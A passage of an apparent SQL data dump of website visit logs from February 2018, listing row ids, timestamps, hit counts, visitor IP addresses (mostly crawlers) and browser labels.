211152,1519183894,1,1,0,0,'54.36.149.62','other'),(211153,1519184643,1,1,0,0,'54.36.148.28','other'),(211154,1519184644,2,2,0,0,'54.165.59.7','other'),(211155,1519184656,1,1,0,0,'54.36.148.171','other'),(211156,1519185371,1,1,0,0,'54.36.148.176','other'),(211157,1519185614,1,1,0,0,'54.36.149.79','other'),(211158,1519185792,1,1,0,0,'54.36.149.71','other'),(211159,1519185806,1,1,0,0,'54.36.149.41','other'),(211160,1519185867,1,1,0,0,'54.36.149.103','other'),(211161,1519185916,1,1,0,0,'54.36.148.253','other'),(211162,1519186015,1,1,0,0,'54.36.148.115','other'),(211163,1519186134,1,1,0,0,'54.36.149.80','other'),(211164,1519186175,1,1,0,0,'54.36.148.39','other'),(211165,1519186396,1,1,0,0,'141.8.142.74','other'),(211166,1519186486,1,1,0,0,'8.29.198.27','other'),(211167,1519186638,1,1,0,0,'54.36.149.57','other'),(211168,1519186663,1,1,0,0,'54.36.149.34','other'),(211169,1519186770,1,1,0,0,'54.36.148.214','other'),(211170,1519186797,1,1,0,0,'54.36.148.195','other'),(211171,1519187014,1,1,0,0,'54.36.148.221','other'),(211172,1519187032,2,0,2,0,'66.249.66.156',''),(211173,1519187828,1,1,0,0,'54.36.149.12','other'),(211174,1519187935,1,1,0,0,'141.8.142.74','other'),(211175,1519187991,1,1,0,0,'54.36.148.213','other'),(211176,1519188209,1,1,0,0,'141.8.132.19','other'),(211177,1519188283,1,1,0,0,'54.36.148.198','other'),(211178,1519188473,1,1,0,0,'141.105.64.97','firefox'),(211179,1519188521,1,1,0,0,'54.36.148.214','other'),(211180,1519188711,1,1,0,0,'54.36.148.154','other'),(211181,1519188835,1,1,0,0,'54.36.148.166','other'),(211182,1519189816,1,1,0,0,'40.77.167.170','other'),(211183,1519189858,1,1,0,0,'54.36.149.4','other'),(211184,1519190090,2,2,0,0,'54.36.148.23','other'),(211185,1519190382,1,1,0,0,'37.9.113.157','other'),(211186,1519190726,1,1,0,0,'54.36.148.45','other'),(211187,1519190879,1,1,0,0,'54.36.148.169','other'),(211188,1519190927,1,1,0,0,'54.36.148.160','other'),(211189,1519191224,1,1,0,0,'54.36.148.187','other'),(211190,1519191486,1,1,0,0,'54.36.148.20','other'),(211191,1519191834,1,1,0,0,'54.36.149.102','other'),(211192,1519191915,1,1,0,0,'217.69.136.203','other'),(211193,1519192254,1,1,0,0,'54.36.148.182','other'),(211194,1519192269,1,1,0,0,'54.36.149.50','other'),(211195,1519192299,1,1,0,0,'178.154.171.88','other'),(211196,1519193197,1,1,0,0,'54.36.148.187','other'),(211197,1519193202,1,1,0,0,'91.196.178.166','chrome'),(211198,1519193312,2,2,0,0,'91.196.178.65','chrome'),(211199,1519193439,1,1,0,0,'40.77.167.149','other'),(211200,1519193460,1,1,0,0,'54.36.148.186','other'),(211201,1519193717,1,1,0,0,'54.36.149.97','other'),(211202,1519193863,1,1,0,0,'141.8.142.74','other'),(211203,1519193983,1,1,0,0,'54.36.148.243','other'),(211204,1519193985,1,1,0,0,'54.36.149.30','other'),(211205,1519194008,1,1,0,0,'54.36.148.174','other'),(211206,1519194122,1,1,0,0,'54.36.148.188','other'),(211207,1519194139,1,1,0,0,'54.36.149.16','other'),(211208,1519194187,1,1,0,0,'54.36.148.209','other'),(211209,1519194289,1,1,0,0,'54.36.149.93','other'),(211210,1519194613,1,1,0,0,'54.36.149.51','other'),(211211,1519194735,1,1,0,0,'54.36.148.159','other'),(211212,1519194847,1,1,0,0,'54.36.148.148','other'),(211213,1519195131,1,1,0,0,'54.36.148.46','other'),(211214,1519195138,4,4,0,0,'141.8.142.74','other'),(211215,1519195283,1,1,0,0,'217.69.133.85','other'),(211216,1519195710,1,1,0,0,'91.196.178.57','chrome'),(211217,1519195778,1,1,0,0,'141.105.64.97','chrome'),(211218,1519195918,1,0,1,0,'66.249.66.155',''),(211219,1519195963,1,1,0,0,'178.154.171.88','other'),(211220,1519196231,1,1,0,0,'34.227.93.13','other'),(211221,1519196439,1,1,0,0,'40.77.167.149','other'),(211222,1519196806,1,1,0,0,'37.9.113.100','other'),(211223,1519197053,1,0,1,0,'66.249.66.155',''),(211224,1519197158,1,1,0,0,'34.227.93.13','other'),(211225,1519197317,1,1,0,0,'8.29.198.26','other'),(211226,1519197657,1,0,1,0,'66.249.66.156',''),(211227,1519197722,1,1,0,0,'54.36.148.165','other'),(211228,1519197812,1,1,0,0,'54.36.148.159','other'),(211229,1519197872,1,1,0,0,'54.36.148.94','other'),(211230,1519198070,1,1,0,0,'54.36.148.176','other'),(211231,1519198090,1,1,0,0,'34.227.93.13','other'),(211232,1519198117,3,3,0,0,'91.196.178.80','chrome'),(211233,1519198228,1,1,0,0,'54.36.148.35','other'),(211234,1519198247,1,1,0,0,'54.36.148.199','other'),(211235,1519198428,1,1,0,0,'40.77.167.149','other'),(211236,1519198503,1,1,0,0,'178.154.171.88','other'),(211237,1519198522,2,2,0,0,'91.196.178.49','chrome'),(211238,1519198535,1,1,0,0,'54.36.148.145','other'),(211239,1519198544,1,1,0,0,'54.36.149.59','other'),(211240,1519198562,1,1,0,0,'141.8.142.74','other'),(211241,1519198667,1,1,0,0,'54.36.148.79','other'),(211242,1519198679,1,1,0,0,'54.36.148.105','other'),(211243,1519198707,1,1,0,0,'54.36.148.243','other'),(211244,1519198870,1,1,0,0,'54.36.148.82','other'),(211245,1519199365,1,1,0,0,'54.36.149.79','other'),(211246,1519199588,1,1,0,0,'54.165.59.7','other'),(211247,1519199680,1,1,0,0,'54.36.148.141','other'),(211248,1519199701,1,1,0,0,'54.36.148.235','other'),(211249,1519199776,1,1,0,0,'141.8.142.74','other'),(211250,1519199778,1,1,0,0,'91.225.4.8','chrome'),(211251,1519200071,1,1,0,0,'54.36.148.200','other'),(211252,1519200222,1,1,0,0,'54.36.149.71','other'),(211253,1519200322,1,0,1,0,'66.249.66.155',''),(211254,1519200389,1,1,0,0,'87.250.224.46','other'),(211255,1519200863,1,1,0,0,'54.36.148.228','other'),(211256,1519200943,1,1,0,0,'54.36.149.59','other'),(211257,1519200975,1,1,0,0,'92.113.50.163','chrome'),(211258,1519200982,1,1,0,0,'40.77.167.169','other'),(211259,1519201029,1,1,0,0,'54.36.148.179','other'),(211260,1519201244,1,1,0,0,'54.36.148.123','other'),(211261,1519201377,1,1,0,0,'54.36.148.128','other'),(211262,1519201599,1,1,0,0,'54.36.149.2','other'),(211263,1519201995,1,1,0,0,'54.36.149.5','other'),(211264,1519202057,1,1,0,0,'40.77.167.168','other'),(211265,1519202218,1,1,0,0,'54.36.149.90','other'),(211266,1519202321,1,1,0,0,'54.36.148.228','other'),(211267,1519202457,1,1,0,0,'194.44.244.130','firefox'),(211268,1519202695,1,1,0,0,'54.36.149.79','other'),(211269,1519202827,1,1,0,0,'54.36.149.72','other'),(211270,1519202857,1,1,0,0,'54.36.148.27','other'),(211271,1519202879,1,1,0,0,'54.36.148.124','other'),(211272,1519202917,1,1,0,0,'54.36.149.102','other'),(211273,1519202952,1,1,0,0,'54.36.148.30','other'),(211274,1519203108,1,1,0,0,'54.36.148.136','other'),(211275,1519203236,2,2,0,0,'91.196.178.166','chrome'),(211276,1519203259,1,0,1,0,'66.249.66.157',''),(211277,1519203374,1,1,0,0,'178.154.171.88','other'),(211278,1519203693,1,1,0,0,'54.36.148.22','other'),(211279,1519203729,1,1,0,0,'54.36.148.144','other'),(211280,1519203795,2,2,0,0,'54.36.148.24','other'),(211281,1519204117,1,1,0,0,'54.36.148.173','other'),(211282,1519204132,44,44,0,0,'69.30.198.202','other'),(211283,1519204212,1,1,0,0,'54.36.148.183','other'),(211284,1519204306,1,1,0,0,'54.36.148.204','other'),(211285,1519204332,1,1,0,0,'54.36.148.18','other'),(211286,1519204361,1,1,0,0,'54.36.148.203','other'),(211287,1519204653,1,1,0,0,'54.36.148.46','other'),(211288,1519204671,2,2,0,0,'141.8.142.74','other'),(211289,1519204682,1,1,0,0,'54.36.148.159','other'),(211290,1519204805,1,1,0,0,'54.36.148.149','other'),(211291,1519204850,1,1,0,0,'178.154.171.88','other'),(211292,1519204967,1,1,0,0,'54.36.149.5','other'),(211293,1519205142,1,1,0,0,'54.36.149.56','other'),(211294,1519205206,1,1,0,0,'54.36.149.69','other'),(211295,1519205434,1,1,0,0,'91.196.178.85','chrome'),(211296,1519205523,1,1,0,0,'54.36.148.240','other'),(211297,1519205634,1,1,0,0,'54.36.148.35','other'),(211298,1519205741,1,1,0,0,'54.36.148.95','other'),(211299,1519205996,2,2,0,0,'178.62.221.111','chrome'),(211300,1519206005,1,1,0,0,'91.196.178.104','chrome'),(211301,1519206226,1,1,0,0,'54.36.148.63','other'),(211302,1519206343,1,1,0,0,'54.36.149.84','other'),(211303,1519206494,1,1,0,0,'141.8.142.74','other'),(211304,1519206677,1,1,0,0,'108.59.8.70','other'),(211305,1519206837,1,1,0,0,'77.111.244.48','chrome'),(211306,1519207126,1,1,0,0,'54.36.149.18','other'),(211307,1519207215,1,1,0,0,'95.134.223.69','chrome'),(211308,1519207270,1,1,0,0,'40.77.167.169','other'),(211309,1519207275,1,1,0,0,'54.36.148.108','other'),(211310,1519207470,1,1,0,0,'54.36.149.92','other'),(211311,1519207599,2,2,0,0,'5.255.253.5','other'),(211312,1519208099,1,1,0,0,'188.230.43.254','other'),(211313,1519208146,1,1,0,0,'8.29.198.25','other'),(211314,1519208171,1,1,0,0,'54.36.148.243','other'),(211315,1519208192,1,1,0,0,'37.53.90.175','chrome'),(211316,1519208212,1,1,0,0,'54.36.149.83','other'),(211317,1519208423,1,1,0,0,'54.36.148.69','other'),(211318,1519208547,1,1,0,0,'54.36.148.118','other'),(211319,1519208690,1,1,0,0,'54.36.149.51','other'),(211320,1519208711,1,1,0,0,'54.36.148.22','other'),(211321,1519208741,1,1,0,0,'54.36.148.97','other'),(211322,1519208834,2,2,0,0,'5.255.253.5','other'),(211323,1519208904,1,1,0,0,'54.36.148.239','other'),(211324,1519209113,1,1,0,0,'54.36.148.234','other'),(211325,1519209168,1,1,0,0,'54.37.85.62','other'),(211326,1519209276,1,1,0,0,'82.207.49.98','chrome'),(211327,1519209654,1,1,0,0,'217.69.143.69','other'),(211328,1519209713,1,1,0,0,'78.154.177.14','chrome'),(211329,1519209949,1,1,0,0,'54.36.148.238','other'),(211330,1519210021,1,1,0,0,'54.36.148.35','other'),(211331,1519210215,1,1,0,0,'54.36.148.225','other'),(211332,1519210308,1,1,0,0,'54.36.148.81','other'),(211333,1519210759,1,1,0,0,'54.36.148.153','other'),(211334,1519210840,77,77,0,0,'54.37.85.62','other'),(211335,1519210935,1,1,0,0,'141.8.142.74','other'),(211336,1519210983,1,1,0,0,'54.36.148.212','other'),(211337,1519211001,1,0,1,0,'66.249.66.157',''),(211338,1519211401,1,1,0,0,'54.36.148.100','other'),(211339,1519211467,2,2,0,0,'91.196.178.167','chrome'),(211340,1519211741,1,1,0,0,'91.196.178.166','chrome'),(211341,1519211900,2,0,2,0,'66.249.66.74',''),(211342,1519211917,1,1,0,0,'66.249.66.74','chrome'),(211343,1519212171,1,1,0,0,'54.36.149.60','other'),(211344,1519212257,1,1,0,0,'212.90.190.19','other'),(211345,1519212401,1,1,0,0,'54.36.148.33','other'),(211346,1519212496,1,1,0,0,'217.69.143.50','other'),(211347,1519212534,139,139,0,0,'54.37.85.62','other'),(211348,1519212550,1,1,0,0,'54.36.148.102','other'),(211349,1519212654,2,2,0,0,'91.196.178.166','chrome'),(211350,1519212880,1,1,0,0,'54.36.148.253','other'),(211351,1519213118,1,1,0,0,'54.36.148.241','other'),(211352,1519213145,1,1,0,0,'54.36.148.88','other'),(211353,1519213440,130,130,0,0,'54.37.85.62','other'),(211354,1519213660,1,1,0,0,'66.249.66.157','chrome'),(211355,1519213824,1,1,0,0,'195.10.210.70','chrome'),(211356,1519213965,1,1,0,0,'40.77.167.149','other'),(211357,1519214174,2,2,0,0,'141.8.142.74','other'),(211358,1519214250,3,3,0,0,'91.196.178.166','chrome'),(211359,1519214287,1,1,0,0,'54.36.149.61','other'),(211360,1519214341,145,145,0,0,'54.37.85.62','other'),(211361,1519214421,1,1,0,0,'54.36.148.47','other'),(211362,1519214441,1,1,0,0,'54.36.149.23','other'),(211363,1519214493,1,1,0,0,'54.36.148.27','other'),(211364,1519214662,1,1,0,0,'54.36.148.142','other'),(211365,1519214696,1,1,0,0,'54.36.148.181','other'),(211366,1519215038,1,1,0,0,'54.36.148.193','other'),(211367,1519215116,1,1,0,0,'40.77.167.168','other'),(211368,1519215683,1,1,0,0,'54.36.148.158','other'),(211369,1519215809,1,1,0,0,'37.139.25.8','chrome'),(211370,1519216133,2,2,0,0,'188.166.101.66','chrome'),(211371,1519216221,1,1,0,0,'54.36.148.155','other'),(211372,1519216394,2,2,0,0,'141.8.142.74','other'),(211373,1519216440,1,1,0,0,'54.36.148.238','other'),(211374,1519216529,2,2,0,0,'91.196.178.92','chrome'),(211375,1519216762,1,1,0,0,'54.36.148.211','other'),(211376,1519216820,1,1,0,0,'54.36.148.64','other'),(211377,1519216829,1,1,0,0,'40.77.167.170','other'),(211378,1519217006,1,1,0,0,'54.36.148.109','other'),(211379,1519217410,1,0,1,0,'66.249.66.76',''),(211380,1519217414,1,1,0,0,'217.69.133.193','other'),(211381,1519217423,1,1,0,0,'54.36.148.142','other'),(211382,1519217521,1,1,0,0,'91.196.178.73','chrome'),(211383,1519217940,1,1,0,0,'54.36.149.66','other'),(211384,1519218056,1,1,0,0,'54.36.149.58','other'),(211385,1519218069,1,1,0,0,'54.36.148.11','other'),(211386,1519218170,1,1,0,0,'54.36.148.67','other'),(211387,1519218357,1,1,0,0,'54.36.148.39','other'),(211388,1519218383,1,1,0,0,'54.36.148.90','other'),(211389,1519218514,2,2,0,0,'37.54.60.51','chrome'),(211390,1519218804,1,1,0,0,'46.200.236.207','chrome'),(211391,1519218907,9,9,0,0,'92.113.188.43','chrome'),(211392,1519218977,1,1,0,0,'8.29.198.25','other'),(211393,1519218990,1,1,0,0,'54.36.148.32','other'),(211394,1519219158,1,1,0,0,'54.165.59.7','other'),(211395,1519219280,2,0,2,0,'66.249.66.156',''),(211396,1519219403,1,1,0,0,'54.36.149.105','other'),(211397,1519219462,1,1,0,0,'54.36.149.12','other'),(211398,1519219814,4,4,0,0,'92.113.188.43','chrome'),(211399,1519219945,1,1,0,0,'31.13.124.218','other'),(211400,1519219951,1,1,0,0,'173.252.85.50','other'),(211401,1519219952,1,1,0,0,'69.171.225.90','other'),(211402,1519219953,1,1,0,0,'69.63.188.213','other'),(211404,1519219976,1,1,0,0,'91.196.178.166','chrome'),(211405,1519220002,1,1,0,0,'46.133.174.59','chrome'),(211406,1519220306,2,2,0,0,'91.196.178.57','chrome'),(211407,1519220362,1,1,0,0,'54.36.148.33','other'),(211408,1519220364,1,0,1,0,'66.249.66.74',''),(211409,1519220481,1,1,0,0,'54.36.148.177','other'),(211410,1519220520,1,0,1,0,'66.249.66.157',''),(211411,1519220534,1,1,0,0,'54.36.148.242','other'),(211412,1519220560,1,1,0,0,'95.158.2.92','chrome'),(211413,1519220594,1,1,0,0,'54.36.148.68','other'),(211414,1519220624,1,1,0,0,'40.77.167.170','other'),(211415,1519220758,1,1,0,0,'54.36.149.64','other'),(211416,1519220965,1,1,0,0,'54.36.148.90','other'),(211417,1519221108,1,1,0,0,'91.196.178.166','chrome'),(211418,1519221166,1,1,0,0,'54.36.149.69','other'),(211419,1519221393,1,1,0,0,'54.36.148.236','other'),(211420,1519221582,1,1,0,0,'54.36.149.14','other'),(211421,1519221749,1,1,0,0,'54.36.148.142','other'),(211422,1519222122,1,1,0,0,'54.36.148.165','other'),(211423,1519222123,1,1,0,0,'54.36.149.56','other'),(211424,1519222180,1,1,0,0,'54.36.149.62','other'),(211425,1519222243,1,1,0,0,'54.36.148.164','other'),(211426,1519222470,1,1,0,0,'195.88.158.76','chrome'),(211427,1519222656,2,2,0,0,'141.8.142.74','other'),(211428,1519222820,1,1,0,0,'54.36.148.45','other'),(211429,1519223014,1,1,0,0,'54.36.149.35','other'),(211430,1519223161,1,1,0,0,'54.36.148.252','other'),(211431,1519223478,1,1,0,0,'95.134.97.244','chrome'),(211432,1519223717,1,0,1,0,'66.249.66.155',''),(211433,1519223961,1,1,0,0,'54.36.148.80','other'),(211434,1519223989,1,1,0,0,'54.36.149.53','other'),(211435,1519224098,2,2,0,0,'141.8.142.74','other'),(211436,1519224343,1,1,0,0,'91.196.178.65','firefox'),(211437,1519224664,1,1,0,0,'66.249.66.157','chrome'),(211438,1519224783,1,1,0,0,'89.102.46.7','chrome'),(211439,1519224794,1,1,0,0,'178.154.171.88','other'),(211440,1519225148,1,1,0,0,'141.8.142.74','other'),(211441,1519225368,1,1,0,0,'217.69.133.253','other'),(211442,1519225386,1,1,0,0,'217.69.133.193','other'),(211443,1519225408,1,1,0,0,'54.165.59.7','other'),(211444,1519226170,2,2,0,0,'141.8.142.74','other'),(211445,1519226224,1,0,1,0,'66.249.66.156',''),(211446,1519226411,2,0,2,0,'66.249.66.155',''),(211447,1519226464,2,0,2,0,'66.249.66.157',''),(211448,1519226724,1,1,0,0,'37.54.18.59','chrome'),(211449,1519227053,1,1,0,0,'66.220.151.210','other'),(211450,1519227186,1,1,0,0,'40.77.167.169','other'),(211451,1519228130,1,1,0,0,'141.8.142.74','other'),(211452,1519228148,1,1,0,0,'37.9.113.182','other'),(211453,1519228478,1,0,1,0,'66.249.66.155',''),(211454,1519228771,1,1,0,0,'91.196.178.74','firefox'),(211455,1519228780,28,28,0,0,'158.69.252.151','other'),(211456,1519228918,2,2,0,0,'92.113.188.43','chrome'),(211457,1519229034,1,1,0,0,'141.8.142.74','other'),(211458,1519229815,1,1,0,0,'8.29.198.26','other'),(211459,1519230431,3,3,0,0,'91.196.178.5','chrome'),(211460,1519230580,2,2,0,0,'62.80.174.114','chrome'),(211461,1519230661,2,2,0,0,'91.218.195.57','chrome'),(211462,1519230714,2,2,0,0,'178.92.72.196','chrome'),(211463,1519230786,1,1,0,0,'141.8.142.74','other'),(211464,1519231227,1,1,0,0,'217.69.134.155','other'),(211465,1519232294,1,1,0,0,'54.173.23.232','other'),(211466,1519232343,1,1,0,0,'188.230.43.254','other'),(211467,1519233305,1,1,0,0,'54.173.23.232','other'),(211468,1519233528,1,1,0,0,'141.8.142.74','other'),(211469,1519233862,1,0,1,0,'66.249.66.156',''),(211470,1519233928,2,2,0,0,'91.196.178.101','chrome'),(211471,1519234308,1,1,0,0,'54.173.23.232','other'),(211472,1519234457,2,2,0,0,'141.8.142.74','other'),(211473,1519234761,1,1,0,0,'188.230.43.254','other'),(211474,1519235187,1,1,0,0,'178.154.171.88','other'),(211475,1519236529,1,0,1,0,'66.249.66.157',''),(211476,1519236663,1,1,0,0,'188.230.43.254','other'),(211477,1519236910,1,1,0,0,'193.194.127.222','chrome'),(211478,1519237018,1,1,0,0,'66.249.66.157','chrome'),(211479,1519237093,2,0,2,0,'66.249.66.155',''),(211480,1519237385,1,1,0,0,'54.173.23.232','other'),(211481,1519237866,1,1,0,0,'94.74.231.14','other'),(211482,1519238327,2,2,0,0,'91.196.178.81','chrome'),(211483,1519238544,1,0,1,0,'66.249.66.155',''),(211484,1519238634,1,0,1,0,'66.249.66.75',''),(211485,1519238782,1,1,0,0,'66.249.66.155','chrome'),(211486,1519239274,1,0,1,0,'66.249.66.74',''),(211487,1519239436,1,1,0,0,'40.77.167.168','other'),(211488,1519239553,1,1,0,0,'141.8.142.74','other'),(211489,1519239919,1,1,0,0,'40.77.167.149','other'),(211490,1519240097,5,5,0,0,'195.201.36.1','other'),(211491,1519240460,1,1,0,0,'46.200.112.195','chrome'),(211492,1519240461,1,1,0,0,'173.252.86.76','other'),(211493,1519240466,2,2,0,0,'92.113.188.43','chrome'),(211494,1519240644,1,1,0,0,'8.29.198.25','other'),(211495,1519240747,3,3,0,0,'141.8.142.74','other'),(211496,1519241085,1,1,0,0,'188.165.4.128','firefox'),(211497,1519241109,1,0,1,0,'66.249.66.155',''),(211498,1519241545,2,2,0,0,'212.113.43.239','chrome'),(211499,1519242346,1,1,0,0,'54.165.59.7','other'),(211500,1519242837,1,0,1,0,'66.249.66.74',''),(211501,1519243281,1,0,1,0,'66.249.66.157',''),(211502,1519243484,1,1,0,0,'13.56.229.65','chrome'),(211503,1519243976,1,1,0,0,'54.209.23.166','other'),(211504,1519245627,1,1,0,0,'188.165.4.128','firefox'),(211505,1519247157,1,1,0,0,'54.36.148.22','other'),(211506,1519247291,1,1,0,0,'54.36.148.89','other'),(211507,1519247415,1,1,0,0,'54.36.148.92','other'),(211508,1519247492,1,1,0,0,'54.36.149.64','other'),(211509,1519247576,1,0,1,0,'66.249.66.155',''),(211510,1519247606,1,0,1,0,'66.249.66.157',''),(211511,1519247686,1,1,0,0,'54.36.149.91','other'),(211512,1519247776,1,1,0,0,'54.36.148.112','other'),(211513,1519247954,1,1,0,0,'66.249.66.75','chrome'),(211514,1519248023,1,1,0,0,'54.36.148.231','other'),(211515,1519248475,1,1,0,0,'141.8.142.29','other'),(211516,1519248588,1,0,1,0,'66.249.66.74',''),(211517,1519249036,1,1,0,0,'54.36.148.106','other'),(211518,1519249246,1,0,1,0,'66.249.66.155',''),(211519,1519249317,1,1,0,0,'217.69.134.185','other'),(211520,1519249465,1,1,0,0,'217.69.133.203','other'),(211521,1519249732,1,1,0,0,'217.69.133.194','other'),(211522,1519249916,1,1,0,0,'54.36.149.97','other'),(211523,1519249945,1,1,0,0,'54.36.148.145','other'),(211524,1519250193,1,1,0,0,'66.249.66.157','chrome'),(211525,1519250422,1,1,0,0,'54.36.149.23','other'),(211526,1519250565,1,1,0,0,'217.69.134.220','other'),(211527,1519250602,1,1,0,0,'54.36.148.27','other'),(211528,1519250720,1,1,0,0,'180.76.15.17','other'),(211529,1519250734,1,1,0,0,'54.36.148.52','other'),(211530,1519251025,1,1,0,0,'54.36.149.43','other'),(211531,1519251034,1,1,0,0,'54.36.148.155','other'),(211532,1519251096,1,1,0,0,'54.36.149.9','other'),(211533,1519251275,1,1,0,0,'54.36.149.39','other'),(211534,1519251472,1,1,0,0,'8.29.198.25','other'),(211535,1519251497,1,1,0,0,'178.154.171.88','other'),(211536,1519251542,2,2,0,0,'141.8.142.74','other'),(211537,1519251734,1,1,0,0,'217.69.134.177','other'),(211538,1519251848,1,1,0,0,'109.173.125.248','chrome'),(211539,1519251956,1,1,0,0,'40.77.167.168','other'),(211540,1519252008,1,1,0,0,'54.36.148.186','other'),(211541,1519252211,1,1,0,0,'54.36.148.60','other'),(211542,1519252498,1,1,0,0,'87.250.224.77','other'),(211543,1519252681,1,1,0,0,'212.83.178.172','chrome'),(211544,1519252707,1,1,0,0,'217.69.134.176','other'),(211545,1519252774,1,1,0,0,'54.36.148.49','other'),(211546,1519252829,1,1,0,0,'54.36.148.80','other'),(211547,1519253420,1,1,0,0,'141.8.142.74','other'),(211548,1519253458,1,1,0,0,'54.36.149.105','other'),(211549,1519253481,1,1,0,0,'178.154.171.88','other'),(211550,1519253604,1,1,0,0,'217.69.134.188','other'),(211551,1519253714,1,1,0,0,'54.36.148.228','other'),(211552,1519253719,1,1,0,0,'54.36.148.95','other'),(211553,1519253785,1,1,0,0,'54.36.148.195','other'),(211554,1519254153,1,1,0,0,'217.69.133.194','other'),(211555,1519254474,1,1,0,0,'54.36.149.1','other'),(211556,1519254518,1,1,0,0,'54.36.148.244','other'),(211557,1519254521,1,1,0,0,'217.69.134.161','other'),(211558,1519254562,1,1,0,0,'54.36.149.28','other'),(211559,1519254607,1,1,0,0,'66.249.66.74','chrome'),(211560,1519254776,1,1,0,0,'217.69.133.203','other'),(211561,1519254866,1,1,0,0,'54.36.149.20','other'),(211562,1519255004,1,1,0,0,'217.69.133.6','other'),(211563,1519255070,1,1,0,0,'54.36.149.49','other'),(211564,1519255277,1,1,0,0,'217.69.134.188','other'),(211565,1519255536,1,1,0,0,'54.36.149.24','other'),(211566,1519255590,1,1,0,0,'54.36.148.88','other'),(211567,1519255734,1,1,0,0,'217.69.134.161','other'),(211568,1519255890,1,1,0,0,'141.8.142.74','other'),(211569,1519255910,1,1,0,0,'37.9.113.82','other'),(211570,1519255939,1,1,0,0,'217.69.133.6','other'),(211571,1519256191,1,1,0,0,'217.69.134.178','other'),(211572,1519256267,1,1,0,0,'217.69.134.174','other'),(211573,1519256380,1,0,1,0,'66.249.66.156',''),(211574,1519256417,1,1,0,0,'217.69.134.176','other'),(211575,1519256656,1,1,0,0,'217.69.133.2','other'),(211576,1519256664,1,1,0,0,'52.201.107.155','other'),(211577,1519256712,1,1,0,0,'54.36.148.202','other'),(211578,1519256815,1,1,0,0,'217.69.134.175','other'),(211579,1519256853,1,1,0,0,'54.36.148.193','other'),(211580,1519257014,1,1,0,0,'217.69.134.200','other'),(211581,1519257099,1,1,0,0,'217.69.134.227','other'),(211582,1519257155,1,1,0,0,'54.36.149.33','other'),(211583,1519257384,1,1,0,0,'66.249.66.157','chrome'),(211584,1519257404,1,0,1,0,'66.249.66.156',''),(211585,1519257798,1,1,0,0,'54.36.148.84','other'),(211586,1519258550,1,1,0,0,'37.9.113.60','other'),(211587,1519259528,1,1,0,0,'54.36.148.80','other'),(211588,1519259877,1,1,0,0,'37.9.113.151','other'),(211589,1519259963,1,1,0,0,'54.36.149.0','other'),(211590,1519260107,1,1,0,0,'54.36.149.75','other'),(211591,1519260417,1,1,0,0,'54.36.149.98','other'),(211592,1519260888,1,1,0,0,'54.36.148.49','other'),(211593,1519260891,1,1,0,0,'54.36.149.99','other'),(211594,1519261525,1,1,0,0,'54.36.148.28','other'),(211595,1519262242,1,1,0,0,'213.180.203.7','other'),(211596,1519262317,1,1,0,0,'8.29.198.25','other'),(211597,1519262586,1,1,0,0,'217.69.133.84','other'),(211598,1519262880,1,1,0,0,'54.36.148.167','other'),(211599,1519262882,1,1,0,0,'54.36.148.202','other'),(211600,1519262928,1,1,0,0,'178.154.171.4','other'),(211601,1519262931,1,1,0,0,'87.250.224.85','other'),(211602,1519263010,1,0,1,0,'66.249.66.157',''),(211603,1519263526,1,1,0,0,'54.36.148.27','other'),(211604,1519263548,1,1,0,0,'54.36.148.229','other'),(211605,1519263696,2,1,1,0,'66.249.66.155',''),(211606,1519263707,1,1,0,0,'54.36.148.211','other'),(211607,1519263789,1,1,0,0,'141.8.142.74','other'),(211608,1519264172,1,1,0,0,'54.165.59.7','other'),(211609,1519264423,1,1,0,0,'54.36.148.246','other'),(211610,1519264458,1,1,0,0,'54.36.148.82','other'),(211611,1519264586,1,1,0,0,'54.36.148.129','other'),(211612,1519264613,1,1,0,0,'54.36.148.219','other'),(211613,1519264624,1,1,0,0,'54.36.148.98','other'),(211614,1519264827,1,1,0,0,'54.36.148.250','other'),(211615,1519264998,1,1,0,0,'54.36.148.26','other'),(211616,1519265271,1,1,0,0,'54.36.148.244','other'),(211617,1519265598,1,1,0,0,'54.36.148.170','other'),(211618,1519266063,1,1,0,0,'54.36.148.176','other'),(211619,1519266635,1,1,0,0,'141.8.142.74','other'),(211620,1519266760,1,0,1,0,'66.249.66.156',''),(211621,1519267329,1,1,0,0,'217.69.136.204','other'),(211622,1519267333,1,1,0,0,'40.77.167.169','other'),(211623,1519267486,1,1,0,0,'54.36.148.129','other'),(211624,1519267895,1,1,0,0,'54.36.148.219','other'),(211625,1519267968,1,1,0,0,'178.154.171.88','other'),(211626,1519268353,1,1,0,0,'54.36.148.234','other'),(211627,1519268528,1,1,0,0,'141.8.142.74','other'),(211628,1519268647,1,1,0,0,'54.36.148.96','other'),(211629,1519269174,1,1,0,0,'54.36.149.10','other'),(211630,1519269528,1,1,0,0,'217.69.133.216','other'),(211631,1519269622,2,2,0,0,'178.154.171.88','other'),(211632,1519270136,1,1,0,0,'54.36.148.217','other'),(211633,1519270230,1,1,0,0,'54.36.148.135','other'),(211634,1519270396,1,1,0,0,'54.36.148.13','other'),(211635,1519270465,1,1,0,0,'141.8.142.74','other'),(211636,1519270941,1,1,0,0,'54.36.148.141','other'),(211637,1519271656,1,1,0,0,'54.36.149.40','other'),(211638,1519272085,1,1,0,0,'54.36.148.99','other'),(211639,1519272110,1,1,0,0,'178.154.171.88','other'),(211640,1519272386,1,1,0,0,'54.36.149.90','other'),(211641,1519272428,2,2,0,0,'141.8.142.74','other'),(211642,1519272464,1,1,0,0,'54.36.149.93','other'),(211643,1519273011,1,1,0,0,'54.36.149.19','other'),(211644,1519273152,1,1,0,0,'8.29.198.26','other'),(211645,1519273935,1,1,0,0,'54.36.148.232','other'),(211646,1519274071,1,1,0,0,'54.36.148.146','other'),(211647,1519274351,1,1,0,0,'54.36.149.74','other'),(211648,1519274615,1,1,0,0,'107.167.104.176','other'),(211649,1519274690,1,1,0,0,'54.36.148.175','other'),(211650,1519274968,1,1,0,0,'54.36.149.21','other'),(211651,1519274971,1,1,0,0,'54.36.149.68','other'),(211652,1519275202,1,1,0,0,'178.154.171.88','other'),(211653,1519275283,1,1,0,0,'54.36.148.114','other'),(211654,1519275373,1,1,0,0,'54.36.148.142','other'),(211655,1519275433,1,1,0,0,'54.36.149.70','other'),(211656,1519275487,1,1,0,0,'54.36.149.55','other'),(211657,1519275699,1,1,0,0,'54.36.149.104','other'),(211658,1519275883,1,1,0,0,'54.36.148.59','other'),(211659,1519276063,1,1,0,0,'40.77.167.149','other'),(211660,1519276136,1,1,0,0,'54.36.149.41','other'),(211661,1519276388,1,1,0,0,'91.196.178.35','chrome'),(211662,1519276543,1,1,0,0,'54.36.149.42','other'),(211663,1519276589,1,1,0,0,'54.36.148.30','other'),(211664,1519276603,1,1,0,0,'54.36.148.227','other'),(211665,1519277214,1,1,0,0,'54.36.149.68','other'),(211666,1519277231,1,1,0,0,'54.3